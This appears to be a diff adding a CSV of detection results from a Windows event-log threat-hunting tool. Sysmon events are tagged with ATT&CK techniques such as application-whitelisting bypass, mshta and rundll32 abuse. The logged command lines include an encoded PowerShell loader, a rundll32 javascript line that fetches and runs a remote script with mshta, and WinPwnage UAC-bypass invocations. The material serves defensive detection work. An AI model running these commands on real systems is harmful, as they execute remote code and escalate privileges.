+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16388
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:30:46.213
+ 365ABB72-2006-5CD8-0000-0010A2862300
+ 2960
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1FF8-5CD8-0000-00102A342000
+ 1332
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16388
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:30:46.213
+ 365ABB72-2006-5CD8-0000-0010A2862300
+ 2960
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1FF8-5CD8-0000-00102A342000
+ 1332
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16388
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:30:46.213
+ 365ABB72-2006-5CD8-0000-0010A2862300
+ 2960
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1FF8-5CD8-0000-00102A342000
+ 1332
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4127
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.837
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4127
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.837
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4127
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.837
+ 365ABB72-1A29-5CE4-0000-001079F92101
+ 2432
+ C:\Windows\System32\mshta.exe
+ 11.00.9600.16428 (winblue_gdr.131013-1700)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16438
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:56:12.485
+ 365ABB72-25FC-5CD8-0000-0010906A1300
+ 2168
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-25EC-5CD8-0000-0010CB0A1000
+ 684
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10920364
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2021-10-21 16:27:02.278
+ 00247C92-94D6-6171-0000-00100514967B
+ 28176
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript.exe
+ cscript.exe //e:jscript testme.js
+ C:\Users\bouss\Desktop\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-3C1A-6169-0000-0020C2790700
+ 0x779c2
+ 1
+ Medium
+ SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 00247C92-85C9-6170-0000-001008E62B6B
+ 24148
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe"
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16438
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:56:12.485
+ 365ABB72-25FC-5CD8-0000-0010906A1300
+ 2168
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-25EC-5CD8-0000-0010CB0A1000
+ 684
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5931
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.622
+ 365ABB72-3D6E-5CEB-0000-0010EF9EFF00
+ 3756
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16438
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:56:12.485
+ 365ABB72-25FC-5CD8-0000-0010906A1300
+ 2168
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-25EC-5CD8-0000-0010CB0A1000
+ 684
+ C:\Python27\python.exe
+ python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424175
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:21.693
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
